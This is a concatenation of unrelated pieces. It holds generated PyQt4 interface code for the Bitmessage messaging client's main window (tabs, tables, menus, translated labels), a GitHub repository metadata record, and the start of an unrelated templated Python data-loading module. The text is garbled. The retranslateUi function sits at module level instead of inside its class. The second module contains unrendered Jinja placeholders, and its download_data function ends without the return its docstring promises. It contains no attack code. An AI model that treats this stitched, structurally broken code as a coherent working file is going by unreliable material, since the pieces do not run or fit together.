        self.tableWidgetYourIdentities.horizontalHeader().setMinimumSectionSize(52)
        self.tableWidgetYourIdentities.horizontalHeader().setSortIndicatorShown(True)
        self.tableWidgetYourIdentities.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetYourIdentities.verticalHeader().setVisible(False)
        self.tableWidgetYourIdentities.verticalHeader().setDefaultSectionSize(26)
        self.tableWidgetYourIdentities.verticalHeader().setSortIndicatorShown(False)
        self.tableWidgetYourIdentities.verticalHeader().setStretchLastSection(False)
        self.gridLayout_3.addWidget(self.tableWidgetYourIdentities, 1, 0, 1, 2)
        icon4 = QtGui.QIcon()
        icon4.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/identities.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.youridentities, icon4, _fromUtf8(""))
        # --- Subscriptions tab: description label, "Add" button, 2-column table ---
        self.subscriptions = QtGui.QWidget()
        self.subscriptions.setObjectName(_fromUtf8("subscriptions"))
        self.gridLayout_4 = QtGui.QGridLayout(self.subscriptions)
        self.gridLayout_4.setObjectName(_fromUtf8("gridLayout_4"))
        self.label_5 = QtGui.QLabel(self.subscriptions)
        self.label_5.setWordWrap(True)
        self.label_5.setObjectName(_fromUtf8("label_5"))
        self.gridLayout_4.addWidget(self.label_5, 0, 0, 1, 2)
        self.pushButtonAddSubscription = QtGui.QPushButton(self.subscriptions)
        self.pushButtonAddSubscription.setObjectName(_fromUtf8("pushButtonAddSubscription"))
        self.gridLayout_4.addWidget(self.pushButtonAddSubscription, 1, 0, 1, 1)
        spacerItem2 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.gridLayout_4.addItem(spacerItem2, 1, 1, 1, 1)
        self.tableWidgetSubscriptions = QtGui.QTableWidget(self.subscriptions)
        self.tableWidgetSubscriptions.setAlternatingRowColors(True)
        self.tableWidgetSubscriptions.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
        self.tableWidgetSubscriptions.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetSubscriptions.setObjectName(_fromUtf8("tableWidgetSubscriptions"))
        self.tableWidgetSubscriptions.setColumnCount(2)
        self.tableWidgetSubscriptions.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSubscriptions.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetSubscriptions.setHorizontalHeaderItem(1, item)
        self.tableWidgetSubscriptions.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetSubscriptions.horizontalHeader().setDefaultSectionSize(400)
        self.tableWidgetSubscriptions.horizontalHeader().setHighlightSections(False)
        self.tableWidgetSubscriptions.horizontalHeader().setSortIndicatorShown(False)
        self.tableWidgetSubscriptions.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetSubscriptions.verticalHeader().setVisible(False)
        self.gridLayout_4.addWidget(self.tableWidgetSubscriptions, 2, 0, 1, 2)
        icon5 = QtGui.QIcon()
        icon5.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/subscriptions.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.subscriptions, icon5, _fromUtf8(""))
        # --- Address Book tab: same layout pattern as Subscriptions ---
        self.addressbook = QtGui.QWidget()
        self.addressbook.setObjectName(_fromUtf8("addressbook"))
        self.gridLayout_5 = QtGui.QGridLayout(self.addressbook)
        self.gridLayout_5.setObjectName(_fromUtf8("gridLayout_5"))
        self.label_6 = QtGui.QLabel(self.addressbook)
        self.label_6.setWordWrap(True)
        self.label_6.setObjectName(_fromUtf8("label_6"))
        self.gridLayout_5.addWidget(self.label_6, 0, 0, 1, 2)
        self.pushButtonAddAddressBook = QtGui.QPushButton(self.addressbook)
        self.pushButtonAddAddressBook.setObjectName(_fromUtf8("pushButtonAddAddressBook"))
        self.gridLayout_5.addWidget(self.pushButtonAddAddressBook, 1, 0, 1, 1)
        spacerItem3 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.gridLayout_5.addItem(spacerItem3, 1, 1, 1, 1)
        self.tableWidgetAddressBook = QtGui.QTableWidget(self.addressbook)
        self.tableWidgetAddressBook.setAlternatingRowColors(True)
        self.tableWidgetAddressBook.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection)
        self.tableWidgetAddressBook.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetAddressBook.setObjectName(_fromUtf8("tableWidgetAddressBook"))
        self.tableWidgetAddressBook.setColumnCount(2)
        self.tableWidgetAddressBook.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetAddressBook.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetAddressBook.setHorizontalHeaderItem(1, item)
        self.tableWidgetAddressBook.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetAddressBook.horizontalHeader().setDefaultSectionSize(400)
        self.tableWidgetAddressBook.horizontalHeader().setHighlightSections(False)
        self.tableWidgetAddressBook.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetAddressBook.verticalHeader().setVisible(False)
        self.gridLayout_5.addWidget(self.tableWidgetAddressBook, 2, 0, 1, 2)
        icon6 = QtGui.QIcon()
        icon6.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/addressbook.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.addressbook, icon6, _fromUtf8(""))
        # --- Blacklist/Whitelist tab: mode radio buttons (blacklist default),
        #     "Add" button and a 2-column table ---
        self.blackwhitelist = QtGui.QWidget()
        self.blackwhitelist.setObjectName(_fromUtf8("blackwhitelist"))
        self.gridLayout_6 = QtGui.QGridLayout(self.blackwhitelist)
        self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
        self.radioButtonBlacklist = QtGui.QRadioButton(self.blackwhitelist)
        self.radioButtonBlacklist.setChecked(True)
        self.radioButtonBlacklist.setObjectName(_fromUtf8("radioButtonBlacklist"))
        self.gridLayout_6.addWidget(self.radioButtonBlacklist, 0, 0, 1, 2)
        self.radioButtonWhitelist = QtGui.QRadioButton(self.blackwhitelist)
        self.radioButtonWhitelist.setObjectName(_fromUtf8("radioButtonWhitelist"))
        self.gridLayout_6.addWidget(self.radioButtonWhitelist, 1, 0, 1, 2)
        self.pushButtonAddBlacklist = QtGui.QPushButton(self.blackwhitelist)
        self.pushButtonAddBlacklist.setObjectName(_fromUtf8("pushButtonAddBlacklist"))
        self.gridLayout_6.addWidget(self.pushButtonAddBlacklist, 2, 0, 1, 1)
        spacerItem4 = QtGui.QSpacerItem(689, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
        self.gridLayout_6.addItem(spacerItem4, 2, 1, 1, 1)
        self.tableWidgetBlacklist = QtGui.QTableWidget(self.blackwhitelist)
        self.tableWidgetBlacklist.setAlternatingRowColors(True)
        self.tableWidgetBlacklist.setSelectionMode(QtGui.QAbstractItemView.SingleSelection)
        self.tableWidgetBlacklist.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
        self.tableWidgetBlacklist.setObjectName(_fromUtf8("tableWidgetBlacklist"))
        self.tableWidgetBlacklist.setColumnCount(2)
        self.tableWidgetBlacklist.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetBlacklist.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetBlacklist.setHorizontalHeaderItem(1, item)
        self.tableWidgetBlacklist.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetBlacklist.horizontalHeader().setDefaultSectionSize(400)
        self.tableWidgetBlacklist.horizontalHeader().setHighlightSections(False)
        self.tableWidgetBlacklist.horizontalHeader().setSortIndicatorShown(False)
        self.tableWidgetBlacklist.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetBlacklist.verticalHeader().setVisible(False)
        self.gridLayout_6.addWidget(self.tableWidgetBlacklist, 3, 0, 1, 2)
        icon7 = QtGui.QIcon()
        icon7.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/blacklist.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.blackwhitelist, icon7, _fromUtf8(""))
        # --- Network Status tab: absolutely-positioned widgets (no layout) ---
        self.networkstatus = QtGui.QWidget()
        self.networkstatus.setObjectName(_fromUtf8("networkstatus"))
        self.pushButtonStatusIcon = QtGui.QPushButton(self.networkstatus)
        self.pushButtonStatusIcon.setGeometry(QtCore.QRect(680, 440, 21, 23))
        self.pushButtonStatusIcon.setText(_fromUtf8(""))
        icon8 = QtGui.QIcon()
        icon8.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/redicon.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.pushButtonStatusIcon.setIcon(icon8)
        self.pushButtonStatusIcon.setFlat(True)
        self.pushButtonStatusIcon.setObjectName(_fromUtf8("pushButtonStatusIcon"))
        # Connection-count table uses a custom grey base palette in all states.
        self.tableWidgetConnectionCount = QtGui.QTableWidget(self.networkstatus)
        self.tableWidgetConnectionCount.setGeometry(QtCore.QRect(20, 70, 241, 241))
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(212, 208, 200))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
        self.tableWidgetConnectionCount.setPalette(palette)
        self.tableWidgetConnectionCount.setFrameShape(QtGui.QFrame.Box)
        self.tableWidgetConnectionCount.setFrameShadow(QtGui.QFrame.Plain)
        self.tableWidgetConnectionCount.setProperty("showDropIndicator", False)
        self.tableWidgetConnectionCount.setAlternatingRowColors(True)
        self.tableWidgetConnectionCount.setSelectionMode(QtGui.QAbstractItemView.NoSelection)
        self.tableWidgetConnectionCount.setObjectName(_fromUtf8("tableWidgetConnectionCount"))
        self.tableWidgetConnectionCount.setColumnCount(2)
        self.tableWidgetConnectionCount.setRowCount(0)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetConnectionCount.setHorizontalHeaderItem(0, item)
        item = QtGui.QTableWidgetItem()
        self.tableWidgetConnectionCount.setHorizontalHeaderItem(1, item)
        self.tableWidgetConnectionCount.horizontalHeader().setCascadingSectionResizes(True)
        self.tableWidgetConnectionCount.horizontalHeader().setHighlightSections(False)
        self.tableWidgetConnectionCount.horizontalHeader().setStretchLastSection(True)
        self.tableWidgetConnectionCount.verticalHeader().setVisible(False)
        # Status labels; their text is filled in elsewhere at runtime.
        self.labelTotalConnections = QtGui.QLabel(self.networkstatus)
        self.labelTotalConnections.setGeometry(QtCore.QRect(20, 30, 401, 16))
        self.labelTotalConnections.setObjectName(_fromUtf8("labelTotalConnections"))
        self.labelStartupTime = QtGui.QLabel(self.networkstatus)
        self.labelStartupTime.setGeometry(QtCore.QRect(320, 110, 331, 20))
        self.labelStartupTime.setObjectName(_fromUtf8("labelStartupTime"))
        self.labelMessageCount = QtGui.QLabel(self.networkstatus)
        self.labelMessageCount.setGeometry(QtCore.QRect(350, 130, 361, 16))
        self.labelMessageCount.setObjectName(_fromUtf8("labelMessageCount"))
        self.labelPubkeyCount = QtGui.QLabel(self.networkstatus)
        self.labelPubkeyCount.setGeometry(QtCore.QRect(350, 170, 331, 16))
        self.labelPubkeyCount.setObjectName(_fromUtf8("labelPubkeyCount"))
        self.labelBroadcastCount = QtGui.QLabel(self.networkstatus)
        self.labelBroadcastCount.setGeometry(QtCore.QRect(350, 150, 351, 16))
        self.labelBroadcastCount.setObjectName(_fromUtf8("labelBroadcastCount"))
        self.labelLookupsPerSecond = QtGui.QLabel(self.networkstatus)
        self.labelLookupsPerSecond.setGeometry(QtCore.QRect(320, 250, 291, 16))
        self.labelLookupsPerSecond.setObjectName(_fromUtf8("labelLookupsPerSecond"))
        self.labelBytesRecvCount = QtGui.QLabel(self.networkstatus)
        self.labelBytesRecvCount.setGeometry(QtCore.QRect(350, 210, 251, 16))
        self.labelBytesRecvCount.setObjectName(_fromUtf8("labelBytesRecvCount"))
        self.labelBytesSentCount = QtGui.QLabel(self.networkstatus)
        self.labelBytesSentCount.setGeometry(QtCore.QRect(350, 230, 251, 16))
        self.labelBytesSentCount.setObjectName(_fromUtf8("labelBytesSentCount"))
        icon9 = QtGui.QIcon()
        icon9.addPixmap(QtGui.QPixmap(_fromUtf8(":/newPrefix/images/networkstatus.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        self.tabWidget.addTab(self.networkstatus, icon9, _fromUtf8(""))
        # --- Assemble central widget, menu bar and status bar ---
        self.gridLayout.addWidget(self.tabWidget, 0, 0, 1, 1)
        MainWindow.setCentralWidget(self.centralwidget)
        self.menubar = QtGui.QMenuBar(MainWindow)
        self.menubar.setGeometry(QtCore.QRect(0, 0, 885, 21))
        self.menubar.setObjectName(_fromUtf8("menubar"))
        self.menuFile = QtGui.QMenu(self.menubar)
        self.menuFile.setObjectName(_fromUtf8("menuFile"))
        self.menuSettings = QtGui.QMenu(self.menubar)
        self.menuSettings.setObjectName(_fromUtf8("menuSettings"))
        self.menuHelp = QtGui.QMenu(self.menubar)
        self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
        MainWindow.setMenuBar(self.menubar)
        self.statusbar = QtGui.QStatusBar(MainWindow)
        self.statusbar.setMaximumSize(QtCore.QSize(16777215, 22))
        self.statusbar.setObjectName(_fromUtf8("statusbar"))
        MainWindow.setStatusBar(self.statusbar)
        # --- Menu actions (icons come from the desktop theme where available) ---
        self.actionImport_keys = QtGui.QAction(MainWindow)
        self.actionImport_keys.setObjectName(_fromUtf8("actionImport_keys"))
        self.actionManageKeys = QtGui.QAction(MainWindow)
        self.actionManageKeys.setCheckable(False)
        self.actionManageKeys.setEnabled(True)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("dialog-password"))
        self.actionManageKeys.setIcon(icon)
        self.actionManageKeys.setObjectName(_fromUtf8("actionManageKeys"))
        self.actionExit = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("application-exit"))
        self.actionExit.setIcon(icon)
        self.actionExit.setObjectName(_fromUtf8("actionExit"))
        self.actionHelp = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("help-contents"))
        self.actionHelp.setIcon(icon)
        self.actionHelp.setObjectName(_fromUtf8("actionHelp"))
        self.actionAbout = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("help-about"))
        self.actionAbout.setIcon(icon)
        self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
        self.actionSettings = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("document-properties"))
        self.actionSettings.setIcon(icon)
        self.actionSettings.setObjectName(_fromUtf8("actionSettings"))
        self.actionRegenerateDeterministicAddresses = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("view-refresh"))
        self.actionRegenerateDeterministicAddresses.setIcon(icon)
        self.actionRegenerateDeterministicAddresses.setObjectName(_fromUtf8("actionRegenerateDeterministicAddresses"))
        self.actionDeleteAllTrashedMessages = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("user-trash"))
        self.actionDeleteAllTrashedMessages.setIcon(icon)
        self.actionDeleteAllTrashedMessages.setObjectName(_fromUtf8("actionDeleteAllTrashedMessages"))
        self.actionJoinChan = QtGui.QAction(MainWindow)
        icon = QtGui.QIcon.fromTheme(_fromUtf8("contact-new"))
        self.actionJoinChan.setIcon(icon)
        self.actionJoinChan.setObjectName(_fromUtf8("actionJoinChan"))
        # Populate the File / Settings / Help menus.
        self.menuFile.addAction(self.actionManageKeys)
        self.menuFile.addAction(self.actionDeleteAllTrashedMessages)
        self.menuFile.addAction(self.actionRegenerateDeterministicAddresses)
        self.menuFile.addAction(self.actionJoinChan)
        self.menuFile.addAction(self.actionExit)
        self.menuSettings.addAction(self.actionSettings)
        self.menuHelp.addAction(self.actionHelp)
        self.menuHelp.addAction(self.actionAbout)
        self.menubar.addAction(self.menuFile.menuAction())
        self.menubar.addAction(self.menuSettings.menuAction())
        self.menubar.addAction(self.menuHelp.menuAction())
        # Apply translated texts, open on the Inbox tab, then wire signals.
        self.retranslateUi(MainWindow)
        self.tabWidget.setCurrentIndex(0)
        # Old-style (string-based) connects: the "To" field is only enabled in
        # specific-recipient mode, and the broadcast warning label is shown
        # only when broadcast mode is selected.
        QtCore.QObject.connect(self.radioButtonSpecific, QtCore.SIGNAL(_fromUtf8("toggled(bool)")), self.lineEditTo.setEnabled)
        QtCore.QObject.connect(self.radioButtonSpecific, QtCore.SIGNAL(_fromUtf8("clicked(bool)")), self.labelSendBroadcastWarning.hide)
        QtCore.QObject.connect(self.radioButtonBroadcast, QtCore.SIGNAL(_fromUtf8("clicked()")), self.labelSendBroadcastWarning.show)
        QtCore.QMetaObject.connectSlotsByName(MainWindow)
        # --- Keyboard focus (Tab) order across all interactive widgets ---
        MainWindow.setTabOrder(self.tabWidget, self.tableWidgetInbox)
        MainWindow.setTabOrder(self.tableWidgetInbox, self.textEditInboxMessage)
        MainWindow.setTabOrder(self.textEditInboxMessage, self.radioButtonSpecific)
        MainWindow.setTabOrder(self.radioButtonSpecific, self.radioButtonBroadcast)
        MainWindow.setTabOrder(self.radioButtonBroadcast, self.comboBoxSendFrom)
        MainWindow.setTabOrder(self.comboBoxSendFrom, self.lineEditTo)
        MainWindow.setTabOrder(self.lineEditTo, self.pushButtonLoadFromAddressBook)
        MainWindow.setTabOrder(self.pushButtonLoadFromAddressBook, self.lineEditSubject)
        MainWindow.setTabOrder(self.lineEditSubject, self.textEditMessage)
        MainWindow.setTabOrder(self.textEditMessage, self.pushButtonSend)
        MainWindow.setTabOrder(self.pushButtonSend, self.tableWidgetSent)
        MainWindow.setTabOrder(self.tableWidgetSent, self.textEditSentMessage)
        MainWindow.setTabOrder(self.textEditSentMessage, self.pushButtonNewAddress)
        MainWindow.setTabOrder(self.pushButtonNewAddress, self.tableWidgetYourIdentities)
        MainWindow.setTabOrder(self.tableWidgetYourIdentities, self.pushButtonAddSubscription)
        MainWindow.setTabOrder(self.pushButtonAddSubscription, self.tableWidgetSubscriptions)
        MainWindow.setTabOrder(self.tableWidgetSubscriptions, self.pushButtonAddAddressBook)
        MainWindow.setTabOrder(self.pushButtonAddAddressBook, self.tableWidgetAddressBook)
        MainWindow.setTabOrder(self.tableWidgetAddressBook, self.radioButtonBlacklist)
        MainWindow.setTabOrder(self.radioButtonBlacklist, self.radioButtonWhitelist)
        MainWindow.setTabOrder(self.radioButtonWhitelist, self.pushButtonAddBlacklist)
        MainWindow.setTabOrder(self.pushButtonAddBlacklist, self.tableWidgetBlacklist)
        MainWindow.setTabOrder(self.tableWidgetBlacklist, self.tableWidgetConnectionCount)
        MainWindow.setTabOrder(self.tableWidgetConnectionCount, self.pushButtonStatusIcon)
def retranslateUi(self, MainWindow):
    """Install every user-visible string on the main window.

    NOTE(review): this looks like pyuic4-generated code (uses _translate /
    horizontalHeaderItem patterns) -- hand edits are normally overwritten
    when the .ui file is recompiled; confirm before modifying.
    """
    MainWindow.setWindowTitle(_translate("MainWindow", "Bitmessage", None))
    # Inbox tab: search box, search-scope combo, and message table headers.
    self.inboxSearchLineEdit.setPlaceholderText(_translate("MainWindow", "Search", None))
    self.inboxSearchOptionCB.setItemText(0, _translate("MainWindow", "All", None))
    self.inboxSearchOptionCB.setItemText(1, _translate("MainWindow", "To", None))
    self.inboxSearchOptionCB.setItemText(2, _translate("MainWindow", "From", None))
    self.inboxSearchOptionCB.setItemText(3, _translate("MainWindow", "Subject", None))
    self.inboxSearchOptionCB.setItemText(4, _translate("MainWindow", "Message", None))
    self.tableWidgetInbox.setSortingEnabled(True)
    item = self.tableWidgetInbox.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "To", None))
    item = self.tableWidgetInbox.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "From", None))
    item = self.tableWidgetInbox.horizontalHeaderItem(2)
    item.setText(_translate("MainWindow", "Subject", None))
    item = self.tableWidgetInbox.horizontalHeaderItem(3)
    item.setText(_translate("MainWindow", "Received", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.inbox), _translate("MainWindow", "Inbox", None))
    # Send tab: compose form labels, buttons, and the empty rich-text body.
    self.pushButtonLoadFromAddressBook.setText(_translate("MainWindow", "Load from Address book", None))
    self.label_3.setText(_translate("MainWindow", "Subject:", None))
    self.pushButtonSend.setText(_translate("MainWindow", "Send", None))
    self.labelHumanFriendlyTTLDescription.setText(_translate("MainWindow", "X days", None))
    self.label_4.setText(_translate("MainWindow", "Message:", None))
    self.label.setText(_translate("MainWindow", "To:", None))
    self.radioButtonSpecific.setText(_translate("MainWindow", "Send to one or more specific people", None))
    self.labelSendBroadcastWarning.setText(_translate("MainWindow", "Be aware that broadcasts are only encrypted with your address. Anyone who knows your address can read them.", None))
    self.radioButtonBroadcast.setText(_translate("MainWindow", "Broadcast to everyone who is subscribed to your address", None))
    self.pushButtonTTL.setText(_translate("MainWindow", "TTL:", None))
    self.label_2.setText(_translate("MainWindow", "From:", None))
    self.textEditMessage.setHtml(_translate("MainWindow", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
        "<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
        "p, li { white-space: pre-wrap; }\n"
        "</style></head><body style=\" font-family:\'MS Shell Dlg 2\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
        "<p style=\"-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><br /></p></body></html>", None))
    self.pushButtonFetchNamecoinID.setText(_translate("MainWindow", "Fetch Namecoin ID", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.send), _translate("MainWindow", "Send", None))
    # Sent tab: search widgets and sent-message table headers.
    self.sentSearchLineEdit.setPlaceholderText(_translate("MainWindow", "Search", None))
    self.sentSearchOptionCB.setItemText(0, _translate("MainWindow", "All", None))
    self.sentSearchOptionCB.setItemText(1, _translate("MainWindow", "To", None))
    self.sentSearchOptionCB.setItemText(2, _translate("MainWindow", "From", None))
    self.sentSearchOptionCB.setItemText(3, _translate("MainWindow", "Subject", None))
    self.sentSearchOptionCB.setItemText(4, _translate("MainWindow", "Message", None))
    self.tableWidgetSent.setSortingEnabled(True)
    item = self.tableWidgetSent.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "To", None))
    item = self.tableWidgetSent.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "From", None))
    item = self.tableWidgetSent.horizontalHeaderItem(2)
    item.setText(_translate("MainWindow", "Subject", None))
    item = self.tableWidgetSent.horizontalHeaderItem(3)
    item.setText(_translate("MainWindow", "Status", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.sent), _translate("MainWindow", "Sent", None))
    # Your Identities tab.
    self.pushButtonNewAddress.setText(_translate("MainWindow", "New", None))
    self.tableWidgetYourIdentities.setSortingEnabled(True)
    item = self.tableWidgetYourIdentities.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "Label (not shown to anyone)", None))
    item = self.tableWidgetYourIdentities.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "Address", None))
    item = self.tableWidgetYourIdentities.horizontalHeaderItem(2)
    item.setText(_translate("MainWindow", "Stream", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.youridentities), _translate("MainWindow", "Your Identities", None))
    # Subscriptions tab.
    self.label_5.setText(_translate("MainWindow", "Here you can subscribe to \'broadcast messages\' that are sent by other users. Messages will appear in your Inbox. Addresses here override those on the Blacklist tab.", None))
    self.pushButtonAddSubscription.setText(_translate("MainWindow", "Add new Subscription", None))
    self.tableWidgetSubscriptions.setSortingEnabled(True)
    item = self.tableWidgetSubscriptions.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "Label", None))
    item = self.tableWidgetSubscriptions.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "Address", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.subscriptions), _translate("MainWindow", "Subscriptions", None))
    # Address Book tab.
    self.label_6.setText(_translate("MainWindow", "The Address book is useful for adding names or labels to other people\'s Bitmessage addresses so that you can recognize them more easily in your inbox. You can add entries here using the \'Add\' button, or from your inbox by right-clicking on a message.", None))
    self.pushButtonAddAddressBook.setText(_translate("MainWindow", "Add new entry", None))
    self.tableWidgetAddressBook.setSortingEnabled(True)
    item = self.tableWidgetAddressBook.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "Name or Label", None))
    item = self.tableWidgetAddressBook.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "Address", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.addressbook), _translate("MainWindow", "Address Book", None))
    # Blacklist / Whitelist tab.
    self.radioButtonBlacklist.setText(_translate("MainWindow", "Use a Blacklist (Allow all incoming messages except those on the Blacklist)", None))
    self.radioButtonWhitelist.setText(_translate("MainWindow", "Use a Whitelist (Block all incoming messages except those on the Whitelist)", None))
    self.pushButtonAddBlacklist.setText(_translate("MainWindow", "Add new entry", None))
    self.tableWidgetBlacklist.setSortingEnabled(True)
    item = self.tableWidgetBlacklist.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "Name or Label", None))
    item = self.tableWidgetBlacklist.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "Address", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.blackwhitelist), _translate("MainWindow", "Blacklist", None))
    # Network Status tab.
    item = self.tableWidgetConnectionCount.horizontalHeaderItem(0)
    item.setText(_translate("MainWindow", "Stream #", None))
    item = self.tableWidgetConnectionCount.horizontalHeaderItem(1)
    item.setText(_translate("MainWindow", "Connections", None))
    self.labelTotalConnections.setText(_translate("MainWindow", "Total connections:", None))
    self.labelStartupTime.setText(_translate("MainWindow", "Since startup:", None))
    self.labelMessageCount.setText(_translate("MainWindow", "Processed 0 person-to-person messages.", None))
    self.labelPubkeyCount.setText(_translate("MainWindow", "Processed 0 public keys.", None))
    self.labelBroadcastCount.setText(_translate("MainWindow", "Processed 0 broadcasts.", None))
    self.labelLookupsPerSecond.setText(_translate("MainWindow", "Inventory lookups per second: 0", None))
    self.labelBytesRecvCount.setText(_translate("MainWindow", "Down: 0 KB/s", None))
    self.labelBytesSentCount.setText(_translate("MainWindow", "Up: 0 KB/s", None))
    self.tabWidget.setTabText(self.tabWidget.indexOf(self.networkstatus), _translate("MainWindow", "Network Status", None))
    # Menus and actions.
    self.menuFile.setTitle(_translate("MainWindow", "File", None))
    self.menuSettings.setTitle(_translate("MainWindow", "Settings", None))
    self.menuHelp.setTitle(_translate("MainWindow", "Help", None))
    self.actionImport_keys.setText(_translate("MainWindow", "Import keys", None))
    self.actionManageKeys.setText(_translate("MainWindow", "Manage keys", None))
    self.actionExit.setText(_translate("MainWindow", "Quit", None))
    self.actionExit.setShortcut(_translate("MainWindow", "Ctrl+Q", None))
    self.actionHelp.setText(_translate("MainWindow", "Help", None))
    self.actionHelp.setShortcut(_translate("MainWindow", "F1", None))
    self.actionAbout.setText(_translate("MainWindow", "About", None))
    self.actionSettings.setText(_translate("MainWindow", "Settings", None))
    self.actionRegenerateDeterministicAddresses.setText(_translate("MainWindow", "Regenerate deterministic addresses", None))
    self.actionDeleteAllTrashedMessages.setText(_translate("MainWindow", "Delete all trashed messages", None))
    self.actionJoinChan.setText(_translate("MainWindow", "Join / Create chan", None))
import bitmessage_icons_rc
| {
"content_hash": "9ed62d69a75a5719eb98e6b90535b92b",
"timestamp": "",
"source": "github",
"line_count": 685,
"max_line_length": 317,
"avg_line_length": 68.97080291970804,
"alnum_prop": 0.7347444173986665,
"repo_name": "JosephGoulden/PyBitmessageF2F",
"id": "e35b30cd22b32c2e7e8a611dc4395cb33f36492f",
"size": "47479",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "src/bitmessageqt/bitmessageui.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "2834"
},
{
"name": "Python",
"bytes": "990111"
},
{
"name": "QMake",
"bytes": "11274"
},
{
"name": "Shell",
"bytes": "14814"
}
],
"symlink_target": ""
} |
"""Input functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import pandas as pd
# Jinja template placeholders: the pipeline generator renders these to a
# concrete column-name list and label column before this file becomes
# runnable Python.
SCHEMA = {{ schema }}
TARGET = "{{ target }}"
def download_data(train_path, eval_path):
    """Load the train and eval CSVs and split each into features/labels.

    Args:
        train_path: path (e.g. GCS) to the training CSV.
        eval_path: path (e.g. GCS) to the evaluation CSV.

    Returns:
        train_x: dataframe of training features.
        train_y: flattened array of training labels.
        eval_x: dataframe of eval features.
        eval_y: flattened array of eval labels.
    """
    frames = [pd.read_csv(path, names=SCHEMA)
              for path in (train_path, eval_path)]
    features = []
    labels = []
    for frame in frames:
        features.append(frame.drop(TARGET, axis=1))
        labels.append(np.ravel(frame[TARGET]))
